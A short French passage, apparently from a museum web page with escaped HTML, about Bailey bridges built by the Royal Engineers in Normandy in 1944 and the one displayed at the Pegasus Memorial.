Sans aucune aide m\u00e9canique, une \u00e9quipe du g\u00e9nie (Royal Engineers) pouvait monter et d\u00e9monter un pont rapidement et tr\u00e8s facilement.<br \/>\nLe premier pont Bailey en France a \u00e9t\u00e9 construit \u00e0 quelques centaines de m\u00e8tres au sud du Pegasus bridge. Au cours de la Bataille de Normandie, 17 ponts Bailey ont \u00e9t\u00e9 construits sur l\u2019Orne et le canal afin de permettre aux renforts de traverser.<\/p>\n<p style=\"text-align: center;\">Le pont Bailey expos\u00e9 dans le parc du M\u00e9morial Pegasus a \u00e9t\u00e9 utilis\u00e9 sur la Dives jusqu\u2019en 2001.<\/p>\n<p style=\"text-align: center;\">De nombreux ponts Bailey datant de la
